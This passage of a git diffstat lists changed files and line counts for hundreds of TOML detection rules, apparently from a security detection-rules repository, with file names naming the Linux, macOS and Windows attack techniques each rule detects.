...stence_kernel_driver_load_by_non_root.toml | 28 +- ...nel_module_load_from_unusual_location.toml | 28 +- ...rsistence_kernel_object_file_creation.toml | 30 +- ...ce_kubernetes_sensitive_file_activity.toml | 12 +- .../persistence_kworker_file_creation.toml | 38 ++- ...sistence_linux_backdoor_user_creation.toml | 39 +-- .../persistence_linux_group_creation.toml | 40 +-- ...e_linux_shell_activity_via_web_server.toml | 28 +- ..._linux_user_added_to_privileged_group.toml | 45 ++- ...tence_lkm_configuration_file_creation.toml | 25 +- .../persistence_manual_dracut_execution.toml | 33 +- ...rsistence_message_of_the_day_creation.toml | 7 +- ...sistence_message_of_the_day_execution.toml | 7 +- ...etwork_manager_dispatcher_persistence.toml | 52 +++- ...stence_openssl_passwd_hash_generation.toml | 7 +- ...ggable_authentication_module_creation.toml | 30 +- ...cation_module_creation_in_unusual_dir.toml | 30 +- ...ication_module_pam_exec_backdoor_exec.toml | 36 ++- ...authentication_module_source_download.toml | 39 ++- .../persistence_polkit_policy_creation.toml | 33 +- ...persistence_script_executable_bit_set.toml | 12 +- ...nce_process_capability_set_via_setcap.toml | 25 +- .../linux/persistence_pth_file_creation.toml | 44 ++- ...kage_installation_from_unusual_parent.toml | 32 +- ...sistence_setuid_setgid_capability_set.toml | 22 +- .../persistence_shared_object_creation.toml | 47 +-- ...simple_web_server_connection_accepted.toml | 71 +++-- ...ersistence_simple_web_server_creation.toml | 52 +++- ...site_and_user_customize_file_creation.toml | 44 ++- .../linux/persistence_ssh_key_generation.toml | 47 ++- rules/linux/persistence_ssh_netcon.toml | 38 ++- ...stence_ssh_via_backdoored_system_user.toml | 51 ++-- ...suspicious_file_opened_through_editor.toml | 68 +---- ...e_suspicious_ssh_execution_xzbackdoor.toml | 51 +++- ...ersistence_systemd_generator_creation.toml | 41 ++- rules/linux/persistence_systemd_netcon.toml | 65 ++-- .../persistence_systemd_service_started.toml | 37 
++- .../persistence_systemd_shell_execution.toml | 36 ++- ...ersistence_tainted_kernel_module_load.toml | 28 +- ...ainted_kernel_module_out_of_tree_load.toml | 24 +- .../linux/persistence_udev_rule_creation.toml | 12 +- ...ce_unpack_initramfs_via_unmkinitramfs.toml | 38 ++- ...rsistence_unusual_exim4_child_process.toml | 38 +-- .../persistence_unusual_pam_grantor.toml | 41 ++- ...ersistence_unusual_sshd_child_process.toml | 52 +++- ...ser_or_group_creation_or_modification.toml | 12 +- ...sistence_web_server_sus_child_spawned.toml | 48 ++- ...ence_web_server_sus_command_execution.toml | 44 ++- ...tence_web_server_sus_destination_port.toml | 57 +++- ..._web_server_unusual_command_execution.toml | 48 ++- ..._package_manager_plugin_file_creation.toml | 35 ++- ...on_chown_chmod_unauthorized_file_read.toml | 47 ++- ...cve_2025_32463_nsswitch_file_creation.toml | 7 +- ..._cve_2025_32463_sudo_chroot_execution.toml | 12 +- .../privilege_escalation_dac_permissions.toml | 46 +-- ...calation_enlightenment_window_manager.toml | 13 +- ...e_escalation_gdb_sys_ptrace_elevation.toml | 12 +- ...lege_escalation_gdb_sys_ptrace_netcon.toml | 52 +++- ...lege_escalation_kworker_uid_elevation.toml | 40 +-- ...lation_ld_preload_shared_object_modif.toml | 31 +- ...lation_linux_suspicious_symbolic_link.toml | 41 ++- ...n_load_and_unload_of_kernel_via_kexec.toml | 53 +++- ...vilege_escalation_pkexec_envar_hijack.toml | 26 +- ...ation_potential_bufferoverflow_attack.toml | 26 +- ...tion_potential_suid_sgid_exploitation.toml | 25 +- ...n_potential_suid_sgid_proxy_execution.toml | 39 ++- ...lation_potential_wildcard_shell_spawn.toml | 32 +- ...ge_escalation_sda_disk_mount_non_root.toml | 28 +- ...privilege_escalation_shadow_file_read.toml | 26 +- ...vilege_escalation_sudo_cve_2019_14287.toml | 13 +- .../privilege_escalation_sudo_hijacking.toml | 28 +- ...uspicious_cap_setuid_python_execution.toml | 7 +- ...ion_suspicious_chown_fowner_elevation.toml | 37 +-- 
...calation_suspicious_passwd_file_write.toml | 37 +-- ...alation_suspicious_uid_guid_elevation.toml | 7 +- ...uid_elevation_from_unknown_executable.toml | 38 ++- ...lation_unshare_namespace_manipulation.toml | 8 +- ...ery_output_written_to_suspicious_file.toml | 54 ++-- ...e_file_access_followed_by_compression.toml | 48 +-- ..._control_aws_s3_connection_via_script.toml | 51 ++-- ..._control_executable_download_via_wget.toml | 36 ++- ...control_google_calendar_c2_via_script.toml | 59 +++- ...rol_network_connection_to_oast_domain.toml | 43 +-- ...trol_perl_outbound_network_connection.toml | 46 ++- ..._and_control_potential_etherhiding_c2.toml | 64 +++- ..._suspicious_curl_to_google_app_script.toml | 34 +-- ...ection_to_suspicious_top_level_domain.toml | 8 +- ..._connection_to_suspicious_web_service.toml | 8 +- ...dential_access_high_volume_of_pbpaste.toml | 27 +- .../credential_access_kerberosdump_kcc.toml | 16 +- ...s_keychain_pwd_retrieval_security_cmd.toml | 17 +- ...ential_access_mitm_localhost_webproxy.toml | 11 +- ...al_access_promt_for_pwd_via_osascript.toml | 32 +- ...ensitive_file_access_first_occurrence.toml | 25 +- ...vasion_apple_softupdates_modification.toml | 10 +- ...evasion_attempt_del_quarantine_attrib.toml | 19 +- ...evasion_attempt_to_disable_gatekeeper.toml | 8 +- ...ion_gatekeeper_override_and_execution.toml | 36 ++- ..._evasion_modify_environment_launchctl.toml | 30 +- ...cy_controls_tcc_database_modification.toml | 44 ++- ...tion_privacy_pref_sshd_fulldiskaccess.toml | 39 +-- .../defense_evasion_safari_config_change.toml | 16 +- ...dboxed_office_app_suspicious_zip_file.toml | 11 +- ...evasion_suspicious_tcc_access_granted.toml | 70 ++--- ..._evasion_unload_endpointsecurity_kext.toml | 24 +- .../discovery_full_disk_access_check.toml | 36 ++- .../macos/discovery_suspicious_sip_check.toml | 48 ++- ...ystem_and_network_configuration_check.toml | 23 +- ...covery_users_domain_built_in_commands.toml | 15 +- 
...vasion_electron_app_childproc_node_js.toml | 30 +- ...l_access_suspicious_browser_childproc.toml | 13 +- ...staller_package_spawned_network_event.toml | 46 +-- ...n_python_shell_spawn_first_occurrence.toml | 10 +- ...cution_script_via_automator_workflows.toml | 8 +- ...ing_osascript_exec_followed_by_netcon.toml | 32 +- ...n_shell_execution_via_apple_scripting.toml | 18 +- ...ution_unusual_library_load_via_python.toml | 23 +- ...uspicious_mac_ms_office_child_process.toml | 55 ++-- ...ential_access_kerberos_bifrostconsole.toml | 38 +-- ...ral_movement_remote_ssh_login_enabled.toml | 31 +- ...ment_suspicious_curl_to_jamf_endpoint.toml | 41 ++- ...teral_movement_vpn_connection_attempt.toml | 26 +- ...stence_account_creation_hide_at_logon.toml | 39 ++- ...sistence_apple_mail_rule_modification.toml | 31 +- ...ce_creation_change_launch_agents_file.toml | 13 +- ..._creation_hidden_login_item_osascript.toml | 47 ++- ..._access_authorization_plugin_creation.toml | 34 +-- ...ence_curl_execution_via_shell_profile.toml | 44 +-- ...launch_agent_deamon_logonitem_process.toml | 43 ++- ...e_docker_shortcuts_plist_modification.toml | 14 +- .../persistence_enable_root_account.toml | 36 +-- ...n_hidden_launch_agent_deamon_creation.toml | 38 +-- ...sistence_finder_sync_plugin_pluginkit.toml | 11 +- ...istence_folder_action_scripts_runtime.toml | 33 +- .../persistence_hidden_plist_filename.toml | 69 +++-- ...rsistence_login_logout_hooks_defaults.toml | 8 +- ...stence_loginwindow_plist_modification.toml | 26 +- ...nce_manual_chromium_extension_loading.toml | 44 ++- ...ersistence_periodic_tasks_file_mdofiy.toml | 10 +- ...t_or_daemon_creation_first_occurrence.toml | 10 +- ...e_screensaver_plist_file_modification.toml | 8 +- ...rsistence_startup_item_plist_creation.toml | 53 ++-- ...tence_via_atom_init_file_modification.toml | 11 +- ...calation_applescript_with_admin_privs.toml | 34 +-- ...calation_explicit_creds_via_scripting.toml | 33 +- ..._escalation_local_user_added_to_admin.toml | 
42 +-- ...ilege_escalation_root_crontab_filemod.toml | 30 +- ..._escalation_user_added_to_admin_group.toml | 42 +-- ...d_control_ml_packetbeat_dns_tunneling.toml | 15 +- ...d_and_control_ml_packetbeat_rare_urls.toml | 44 +-- ...control_ml_packetbeat_rare_user_agent.toml | 26 +- ..._access_ml_auth_spike_in_logon_events.toml | 8 +- ...pike_in_logon_events_from_a_source_ip.toml | 37 ++- ...execution_ml_windows_anomalous_script.toml | 35 +-- ...nitial_access_ml_auth_rare_user_logon.toml | 35 ++- ...windows_rare_user_type10_remote_login.toml | 31 +- .../ml_high_count_events_for_a_host_name.toml | 58 +++- rules/ml/ml_high_count_network_denies.toml | 66 ++-- rules/ml/ml_high_count_network_events.toml | 54 +++- .../ml_linux_anomalous_network_activity.toml | 60 +++- ...linux_anomalous_network_port_activity.toml | 44 ++- .../ml_low_count_events_for_a_host_name.toml | 27 +- .../ml/ml_packetbeat_rare_server_domain.toml | 58 +++- rules/ml/ml_rare_destination_country.toml | 60 +++- .../ml/ml_spike_in_traffic_to_a_country.toml | 48 +-- ...ml_windows_anomalous_network_activity.toml | 53 +++- ..._ml_linux_anomalous_process_all_hosts.toml | 20 +- ...istence_ml_rare_process_by_host_linux.toml | 30 +- ...tence_ml_rare_process_by_host_windows.toml | 20 +- ...ce_ml_windows_anomalous_path_activity.toml | 33 +- ...l_windows_anomalous_process_all_hosts.toml | 32 +- ...ml_windows_anomalous_process_creation.toml | 35 ++- ...tion_ml_linux_anomalous_sudo_activity.toml | 18 +- ...tion_ml_windows_rare_user_runas_event.toml | 18 +- ..._ml_linux_anomalous_compiler_activity.toml | 20 +- ...cepted_default_telnet_port_connection.toml | 42 ++- ...mand_and_control_cobalt_strike_beacon.toml | 12 +- ...cobalt_strike_default_teamserver_cert.toml | 13 +- .../command_and_control_fin7_c2_behavior.toml | 12 +- .../command_and_control_halfbaked_beacon.toml | 16 +- ...d_control_nat_traversal_port_activity.toml | 8 +- .../command_and_control_port_26_activity.toml | 30 +- 
...te_desktop_protocol_from_the_internet.toml | 30 +- ...l_network_computing_from_the_internet.toml | 34 +-- ...ual_network_computing_to_the_internet.toml | 8 +- ...very_potential_network_sweep_detected.toml | 30 +- ...iscovery_potential_port_scan_detected.toml | 29 +- ...very_potential_syn_port_scan_detected.toml | 8 +- ...rtigate_sso_login_from_unusual_source.toml | 10 +- ...s_react_server_components_rce_attempt.toml | 28 +- ...ccess_react_server_rce_network_alerts.toml | 37 ++- ...mote_procedure_call_from_the_internet.toml | 11 +- ...remote_procedure_call_to_the_internet.toml | 30 +- ...file_sharing_activity_to_the_internet.toml | 18 +- ...al_access_unsecure_elasticsearch_node.toml | 19 +- ..._access_endgame_cred_dumping_detected.toml | 10 +- .../endgame_ransomware_detected.toml | 16 +- .../endgame_ransomware_prevented.toml | 16 +- .../execution_endgame_exploit_detected.toml | 28 +- .../execution_endgame_exploit_prevented.toml | 11 +- ...on_endgame_cred_manipulation_detected.toml | 18 +- ...n_endgame_cred_manipulation_prevented.toml | 18 +- ...ion_endgame_permission_theft_detected.toml | 28 +- ...on_endgame_permission_theft_prevented.toml | 28 +- ...on_endgame_process_injection_detected.toml | 18 +- ...n_endgame_process_injection_prevented.toml | 18 +- .../threat_intel_indicator_match_email.toml | 17 +- ...lection_email_outlook_mailbox_via_com.toml | 21 +- ...ion_email_powershell_exchange_mailbox.toml | 43 ++- .../collection_mailbox_export_winlog.toml | 13 +- .../collection_posh_audio_capture.toml | 24 +- .../collection_posh_clipboard_capture.toml | 22 +- rules/windows/collection_posh_keylogger.toml | 44 ++- rules/windows/collection_posh_mailbox.toml | 24 +- .../collection_posh_screen_grabber.toml | 22 +- .../collection_posh_webcam_video_capture.toml | 19 +- .../windows/collection_winrar_encryption.toml | 8 +- .../command_and_control_certreq_postdata.toml | 35 ++- ...ommand_and_control_common_webservices.toml | 45 ++- 
...control_encrypted_channel_freesslcert.toml | 8 +- .../command_and_control_iexplore_via_com.toml | 45 +-- ...command_and_control_outlook_home_page.toml | 27 +- ...ontrol_port_forwarding_added_registry.toml | 41 ++- .../command_and_control_rdp_tunnel_plink.toml | 16 +- .../command_and_control_remcos_rat_iocs.toml | 35 +-- ...ol_remote_file_copy_desktopimgdownldr.toml | 31 +- ...d_control_remote_file_copy_powershell.toml | 12 +- ..._and_control_remote_file_copy_scripts.toml | 13 +- ...d_and_control_screenconnect_childproc.toml | 31 +- ...control_sunburst_c2_activity_detected.toml | 24 +- ...d_control_teamviewer_remote_file_copy.toml | 8 +- ...nd_and_control_tool_transfer_via_curl.toml | 15 +- .../command_and_control_tunnel_yuze.toml | 8 +- ..._control_velociraptor_shell_execution.toml | 46 ++- .../credential_access_adidns_wildcard.toml | 27 +- ...ential_access_browsers_unusual_parent.toml | 33 +- ...ntial_access_bruteforce_admin_account.toml | 10 +- ...rce_multiple_logon_failure_same_srcip.toml | 10 +- .../credential_access_cmdline_dump_tool.toml | 39 ++- ...ial_access_dcsync_newterm_subjectuser.toml | 36 ++- ...tial_access_dcsync_replication_rights.toml | 36 ++- ...redential_access_dcsync_user_backdoor.toml | 42 +-- ...ntial_access_disable_kerberos_preauth.toml | 49 ++- .../credential_access_dnsnode_creation.toml | 27 +- ...redential_access_dollar_account_relay.toml | 13 +- ..._access_dollar_account_relay_kerberos.toml | 10 +- ...cess_domain_backup_dpapi_private_keys.toml | 12 +- .../credential_access_generic_localdumps.toml | 22 +- ..._access_iis_connectionstrings_dumping.toml | 14 +- .../credential_access_kerberos_coerce.toml | 16 +- ...credential_access_kerberos_coerce_dns.toml | 13 +- .../windows/credential_access_kirbi_file.toml | 8 +- .../credential_access_ldap_attributes.toml | 39 ++- ...edential_access_lsass_loaded_susp_dll.toml | 35 ++- ...edential_access_lsass_openprocess_api.toml | 30 +- ...tial_access_machine_account_smb_relay.toml | 10 +- 
...l_access_mimikatz_memssp_default_logs.toml | 41 ++- ...ial_access_mimikatz_powershell_module.toml | 10 +- ..._access_mod_wdigest_security_provider.toml | 39 +-- ...l_access_moving_registry_hive_via_smb.toml | 37 ++- ...e_network_logon_provider_modification.toml | 20 +- ...edential_access_posh_invoke_ninjacopy.toml | 47 +-- ...edential_access_posh_kerb_ticket_dump.toml | 26 +- .../credential_access_posh_minidump.toml | 22 +- .../credential_access_posh_relay_tools.toml | 28 +- ...credential_access_posh_request_ticket.toml | 25 +- .../credential_access_posh_veeam_sql.toml | 26 +- ...cess_relay_ntlm_auth_via_http_spoolss.toml | 44 ++- ...dential_access_remote_sam_secretsdump.toml | 29 +- ...ntial_access_saved_creds_vault_winlog.toml | 10 +- ...redential_access_saved_creds_vaultcmd.toml | 10 +- ...edelegationprivilege_assigned_to_user.toml | 38 ++- .../credential_access_shadow_credentials.toml | 39 ++- ...dential_access_spn_attribute_modified.toml | 33 +- ...ccess_suspicious_lsass_access_memdump.toml | 19 +- ...cious_winreg_access_via_sebackup_priv.toml | 36 ++- ..._symbolic_link_to_shadow_copy_created.toml | 41 ++- ...ial_access_veeam_backup_dll_imageload.toml | 25 +- .../credential_access_veeam_commands.toml | 41 ++- .../credential_access_wbadmin_ntds.toml | 22 +- ...dential_access_web_config_file_access.toml | 35 +-- ...dential_access_wireless_creds_dumping.toml | 36 ++- ...den_file_attribute_with_via_attribexe.toml | 38 ++- ...efense_evasion_amsi_bypass_powershell.toml | 24 +- ..._evasion_audit_policy_disabled_winlog.toml | 20 +- ...sion_clearing_windows_console_history.toml | 40 ++- ...e_evasion_clearing_windows_event_logs.toml | 12 +- ..._signing_policy_modification_registry.toml | 10 +- ...ication_apps_suspicious_child_process.toml | 42 ++- ...vasion_defender_disabled_via_registry.toml | 12 +- ...ion_defender_exclusion_via_powershell.toml | 29 +- ...efense_evasion_disabling_windows_logs.toml | 20 +- ...vasion_dotnet_compiler_parent_process.toml | 40 ++- 
...ecution_control_panel_suspicious_args.toml | 23 +- ...ense_evasion_execution_lolbas_wuauclt.toml | 21 +- ...ecution_msbuild_started_by_office_app.toml | 30 +- ...n_execution_msbuild_started_by_script.toml | 45 ++- ...ion_msbuild_started_by_system_process.toml | 30 +- ...ion_execution_msbuild_started_renamed.toml | 23 +- ...cution_msbuild_started_unusal_process.toml | 21 +- ...execution_suspicious_explorer_winword.toml | 25 +- ...sion_execution_windefend_unusual_path.toml | 36 ++- ..._evasion_file_creation_mult_extension.toml | 24 +- ...sion_hide_encoded_executable_registry.toml | 15 +- ...ense_evasion_iis_httplogging_disabled.toml | 10 +- ...defense_evasion_indirect_exec_conhost.toml | 11 +- .../defense_evasion_injection_msbuild.toml | 18 +- ...efense_evasion_lolbas_win_cdb_utility.toml | 11 +- ...e_evasion_lsass_ppl_disabled_registry.toml | 9 +- ...querading_as_elastic_endpoint_process.toml | 19 +- ..._masquerading_business_apps_installer.toml | 37 ++- ...asion_masquerading_communication_apps.toml | 19 +- ...erading_suspicious_werfault_childproc.toml | 37 ++- ..._evasion_microsoft_defender_tampering.toml | 8 +- ...nse_evasion_modify_ownership_os_files.toml | 25 +- ...e_evasion_ms_office_suspicious_regmod.toml | 30 +- ...efense_evasion_msiexec_remote_payload.toml | 35 +-- ...etwork_connection_from_windows_binary.toml | 51 +--- ...persistence_account_tokenfilterpolicy.toml | 46 ++- .../defense_evasion_posh_assembly_load.toml | 23 +- .../defense_evasion_posh_compressed.toml | 19 +- ...fense_evasion_posh_defender_tampering.toml | 24 +- .../defense_evasion_posh_encryption.toml | 28 +- .../defense_evasion_posh_high_entropy.toml | 28 +- .../defense_evasion_posh_obfuscation.toml | 27 +- ...nse_evasion_posh_obfuscation_backtick.toml | 27 +- ...evasion_posh_obfuscation_backtick_var.toml | 27 +- ..._evasion_posh_obfuscation_char_arrays.toml | 27 +- ...asion_posh_obfuscation_concat_dynamic.toml | 27 +- ...sh_obfuscation_high_number_proportion.toml | 27 +- 
...fuscation_iex_env_vars_reconstruction.toml | 27 +- ...obfuscation_iex_string_reconstruction.toml | 27 +- ...asion_posh_obfuscation_index_reversal.toml | 24 +- ...sion_posh_obfuscation_reverse_keyword.toml | 27 +- ...vasion_posh_obfuscation_string_concat.toml | 27 +- ...vasion_posh_obfuscation_string_format.toml | 27 +- ...scation_whitespace_special_proportion.toml | 30 +- ...efense_evasion_posh_process_injection.toml | 25 +- ..._powershell_windows_firewall_disabled.toml | 40 ++- ...eg_disable_enableglobalqueryblocklist.toml | 24 +- ...efense_evasion_regmod_remotemonologue.toml | 52 ++-- ...efense_evasion_right_to_left_override.toml | 24 +- rules/windows/defense_evasion_sc_sdset.toml | 24 +- ...ion_scheduledjobs_at_protocol_enabled.toml | 46 ++- ..._evasion_sdelete_like_filename_rename.toml | 34 ++- ...ackdoor_service_disabled_via_registry.toml | 39 ++- ..._evasion_suspicious_certutil_commands.toml | 46 ++- ...picious_execution_from_mounted_device.toml | 27 +- ...n_suspicious_managedcode_host_process.toml | 59 ++-- ...picious_process_access_direct_syscall.toml | 25 +- ...efense_evasion_suspicious_scrobj_load.toml | 10 +- ...defense_evasion_suspicious_wmi_script.toml | 28 +- ...evasion_suspicious_zoom_child_process.toml | 48 ++- ..._critical_proc_abnormal_file_activity.toml | 41 ++- ...sion_unsigned_dll_loaded_from_suspdir.toml | 15 +- ...fense_evasion_untrusted_driver_loaded.toml | 19 +- ...nusual_network_connection_via_dllhost.toml | 29 +- ...usual_network_connection_via_rundll32.toml | 37 ++- ...on_unusual_process_network_connection.toml | 23 +- ...vasion_wdac_policy_by_unusual_process.toml | 8 +- .../defense_evasion_wsl_bash_exec.toml | 31 +- .../defense_evasion_wsl_enabled_via_dism.toml | 15 +- .../defense_evasion_wsl_kalilinux.toml | 45 ++- ...nse_evasion_wsl_registry_modification.toml | 10 +- ...discovery_active_directory_webservice.toml | 8 +- .../discovery_ad_explorer_execution.toml | 17 +- .../discovery_adfind_command_activity.toml | 12 +- 
.../discovery_command_system_account.toml | 36 ++- ...enumerating_domain_trusts_via_dsquery.toml | 8 +- .../discovery_high_number_ad_properties.toml | 18 +- ...scovery_host_public_ip_address_lookup.toml | 39 ++- .../discovery_posh_invoke_sharefinder.toml | 50 ++- ...scovery_posh_suspicious_api_functions.toml | 65 ++-- .../discovery_whoami_command_activity.toml | 8 +- ...arwinds_backdoor_child_cmd_powershell.toml | 40 ++- ...inds_backdoor_unusual_child_processes.toml | 30 +- .../windows/execution_com_object_xwizard.toml | 35 +-- ...and_prompt_connecting_to_the_internet.toml | 45 ++- ...tion_command_shell_started_by_svchost.toml | 18 +- ...mand_shell_started_by_unusual_process.toml | 8 +- .../execution_command_shell_via_rundll32.toml | 69 +++-- ...tion_delayed_via_ping_lolbas_unsigned.toml | 62 ++-- .../execution_downloaded_shortcut_files.toml | 36 ++- .../execution_downloaded_url_file.toml | 34 ++- .../execution_enumeration_via_wmiprvse.toml | 61 ++-- .../execution_from_unusual_path_cmdline.toml | 64 ++-- ...le_program_connecting_to_the_internet.toml | 49 +-- ...cution_initial_access_foxmail_exploit.toml | 17 +- ...execution_initial_access_via_msc_file.toml | 61 ++-- ...cution_initial_access_wps_dll_exploit.toml | 33 +- rules/windows/execution_mofcomp.toml | 23 +- .../execution_ms_office_written_file.toml | 38 ++- .../execution_posh_hacktool_functions.toml | 104 +------ .../execution_posh_portable_executable.toml | 32 +- ...on_powershell_susp_args_via_winscript.toml | 12 +- ...ution_psexec_lateral_movement_command.toml | 17 +- ...er_program_connecting_to_the_internet.toml | 23 +- .../execution_revshell_cmd_via_netcat.toml | 28 +- ...tion_scheduled_task_powershell_source.toml | 43 +-- .../execution_scripting_remote_webdav.toml | 57 ++-- .../execution_scripts_archive_file.toml | 21 +- ...xecution_shared_modules_local_sxs_dll.toml | 34 ++- .../windows/execution_suspicious_cmd_wmi.toml | 38 ++- .../execution_suspicious_pdf_reader.toml | 46 ++- 
.../execution_suspicious_psexesvc.toml | 38 +-- .../execution_via_compiled_html_file.toml | 37 ++- .../execution_via_hidden_shell_conhost.toml | 48 ++- ...ion_via_mmc_console_file_unusual_path.toml | 42 ++- ...execution_windows_cmd_shell_susp_args.toml | 39 ++- .../execution_windows_fakecaptcha_cmd_ps.toml | 76 +++-- .../execution_windows_phish_clickfix.toml | 77 ++++- ...xecution_windows_powershell_susp_args.toml | 35 +-- ...xecution_windows_script_from_internet.toml | 74 ++--- .../exfiltration_rclone_cloud_upload.toml | 8 +- .../exfiltration_smb_rare_destination.toml | 30 +- .../windows/impact_backup_file_deletion.toml | 8 +- ...deleting_backup_catalogs_with_wbadmin.toml | 8 +- ...pact_high_freq_file_renames_by_kernel.toml | 24 +- .../windows/impact_mod_critical_os_files.toml | 30 +- .../impact_ransomware_file_rename_smb.toml | 28 +- .../impact_ransomware_note_file_over_smb.toml | 28 +- ...e_shadow_copy_deletion_via_powershell.toml | 28 +- ..._volume_shadow_copy_deletion_via_wmic.toml | 26 +- ..._evasion_suspicious_htm_file_creation.toml | 36 ++- ...itial_access_execution_from_inetcache.toml | 56 ++-- ...access_execution_from_removable_media.toml | 25 +- ...l_access_execution_remote_via_msiexec.toml | 32 +- ...al_access_execution_via_office_addins.toml | 44 ++- ...cess_exfiltration_first_time_seen_usb.toml | 32 +- ...ial_access_exploit_jetbrains_teamcity.toml | 68 ++--- ..._access_potential_webhelpdesk_exploit.toml | 56 +--- ...itial_access_rdp_file_mail_attachment.toml | 41 ++- ...al_access_script_executing_powershell.toml | 41 ++- ...ccess_scripts_process_started_via_wmi.toml | 37 ++- ...cious_execution_from_vscode_extension.toml | 59 ++-- ...l_access_suspicious_ms_exchange_files.toml | 38 ++- ...access_suspicious_ms_exchange_process.toml | 34 ++- ...ious_ms_exchange_worker_child_process.toml | 60 ++-- ...ss_suspicious_ms_office_child_process.toml | 72 +++-- ...s_suspicious_ms_outlook_child_process.toml | 72 +++-- ..._suspicious_windows_server_update_svc.toml | 
39 ++- .../initial_access_url_cve_2025_33053.toml | 56 ++-- ...explorer_suspicious_child_parent_args.toml | 80 +++-- ..._access_webshell_screenconnect_server.toml | 28 +- ...l_access_xsl_script_execution_via_com.toml | 46 +-- .../lateral_movement_alternate_creds_pth.toml | 30 +- .../windows/lateral_movement_cmd_service.toml | 55 ++-- ...redential_access_kerberos_correlation.toml | 39 ++- rules/windows/lateral_movement_dcom_hta.toml | 24 +- .../windows/lateral_movement_dcom_mmc20.toml | 38 +-- ...t_dcom_shellwindow_shellbrowserwindow.toml | 35 +-- ...n_lanman_nullsessionpipe_modification.toml | 31 +- ...movement_executable_tool_transfer_smb.toml | 13 +- ...nt_execution_via_file_shares_sequence.toml | 10 +- .../lateral_movement_incoming_wmi.toml | 41 +-- ...ment_mount_hidden_or_webdav_share_net.toml | 62 +++- ...l_movement_powershell_remoting_target.toml | 36 ++- ...lateral_movement_rdp_enabled_registry.toml | 32 +- ...ovement_remote_file_copy_hidden_share.toml | 16 +- ...ement_remote_service_installed_winlog.toml | 13 +- .../lateral_movement_remote_services.toml | 33 +- ..._movement_remote_task_creation_winlog.toml | 43 +-- ...ateral_movement_scheduled_task_target.toml | 39 ++- ...movement_unusual_dns_service_children.toml | 34 ++- ...ement_unusual_dns_service_file_writes.toml | 30 +- ...l_movement_via_startup_folder_rdp_smb.toml | 31 +- .../lateral_movement_via_wsus_update.toml | 37 +-- .../windows/persistence_ad_adminsdholder.toml | 35 ++- .../persistence_adobe_hijack_persistence.toml | 15 +- .../windows/persistence_app_compat_shim.toml | 37 +-- .../persistence_appcertdlls_registry.toml | 39 ++- .../persistence_appinitdlls_registry.toml | 34 ++- ...persistence_browser_extension_install.toml | 8 +- ...evasion_hidden_local_account_creation.toml | 39 ++- ...tence_evasion_registry_ifeo_injection.toml | 40 ++- ...egistry_startup_shell_folder_modified.toml | 32 +- ...sistence_group_modification_by_system.toml | 25 +- ...istence_local_scheduled_task_creation.toml | 33 +- 
...stence_local_scheduled_task_scripting.toml | 41 ++- ...istence_msds_alloweddelegateto_krbtgt.toml | 31 +- ...ersistence_msi_installer_task_startup.toml | 47 ++- ...persistence_msoffice_startup_registry.toml | 34 ++- .../windows/persistence_netsh_helper_dll.toml | 19 +- ...ll_exch_mailbox_activesync_add_device.toml | 43 ++- .../persistence_powershell_profiles.toml | 39 ++- ...escalation_via_accessibility_features.toml | 24 +- .../persistence_registry_uncommon.toml | 40 +-- .../persistence_remote_password_reset.toml | 30 +- ...ce_runtime_run_key_startup_susp_procs.toml | 10 +- ...istence_sdprop_exclusion_dsheuristics.toml | 51 ++-- .../persistence_service_dll_unsigned.toml | 56 +++- ...stence_service_windows_service_winlog.toml | 33 +- .../persistence_services_registry.toml | 32 +- ...lder_file_written_by_unsigned_process.toml | 34 ++- .../persistence_startup_folder_scripts.toml | 12 +- ...stence_suspicious_com_hijack_registry.toml | 35 ++- ...s_image_load_scheduled_task_ms_office.toml | 36 ++- ...nce_suspicious_scheduled_task_runtime.toml | 24 +- ...e_suspicious_service_created_registry.toml | 40 ++- ...uspicious_user_mandatory_profile_file.toml | 18 +- ...istence_sysmon_wmi_event_subscription.toml | 33 +- ...ersistence_system_shells_via_services.toml | 60 ++-- .../persistence_temp_scheduled_task.toml | 32 +- .../persistence_time_provider_mod.toml | 39 ++- ..._account_added_to_privileged_group_ad.toml | 35 +-- .../persistence_user_account_creation.toml | 13 +- .../persistence_via_application_shimming.toml | 27 +- ...rsistence_via_bits_job_notify_command.toml | 29 +- ...sistence_via_hidden_run_key_valuename.toml | 60 ++-- ...sa_security_support_provider_registry.toml | 34 ++- ...emetrycontroller_scheduledtask_hijack.toml | 22 +- ...ia_update_orchestrator_service_hijack.toml | 30 +- ...nt_instrumentation_event_subscription.toml | 35 ++- ...tence_via_wmi_stdregprov_run_services.toml | 49 +-- ...ia_xp_cmdshell_mssql_stored_procedure.toml | 53 ++-- 
.../persistence_webshell_detection.toml | 66 ++-- .../persistence_werfault_reflectdebugger.toml | 20 +- ...on_account_takeover_mixed_logon_types.toml | 19 +- ...ge_escalation_badsuccessor_dmsa_abuse.toml | 33 +- ...tion_create_process_as_different_user.toml | 33 +- ...tion_create_process_with_token_unpriv.toml | 33 +- ...privilege_escalation_credroaming_ldap.toml | 33 +- ...ilege_escalation_disable_uac_registry.toml | 56 ++-- ...alation_dmsa_creation_by_unusual_user.toml | 39 ++- ...e_escalation_dns_serverlevelplugindll.toml | 27 +- ...ege_escalation_driver_newterm_imphash.toml | 32 +- ...lege_escalation_expired_driver_loaded.toml | 33 +- ...lege_escalation_exploit_cve_202238028.toml | 32 +- ...calation_gpo_schtask_service_creation.toml | 44 ++- ...ege_escalation_group_policy_iniscript.toml | 41 ++- ...scalation_group_policy_scheduled_task.toml | 39 ++- ...rivilege_escalation_installertakeover.toml | 14 +- ...scalation_krbrelayup_service_creation.toml | 44 +-- ...privilege_escalation_lsa_auth_package.toml | 35 ++- ...privilege_escalation_make_token_local.toml | 35 +-- ...escalation_msi_repair_via_mshelp_link.toml | 22 +- ...e_escalation_named_pipe_impersonation.toml | 8 +- ...scalation_newcreds_logon_rare_process.toml | 36 +-- ...ge_escalation_persistence_phantom_dll.toml | 51 +++- ...on_port_monitor_print_processor_abuse.toml | 34 ++- ...e_escalation_posh_token_impersonation.toml | 56 ++-- ...printspooler_suspicious_file_deletion.toml | 34 ++- ..._escalation_reg_service_imagepath_mod.toml | 59 ++-- ...calation_rogue_windir_environment_var.toml | 10 +- ...lation_samaccountname_spoofing_attack.toml | 44 ++- ...on_service_control_spawned_script_int.toml | 100 +++--- ...alation_suspicious_dnshostname_update.toml | 19 +- ...ege_escalation_takeover_new_source_ip.toml | 31 +- ...escalation_thread_cpu_priority_hijack.toml | 15 +- ...lation_tokenmanip_sedebugpriv_enabled.toml | 25 +- ...lege_escalation_uac_bypass_com_clipup.toml | 43 ++- 
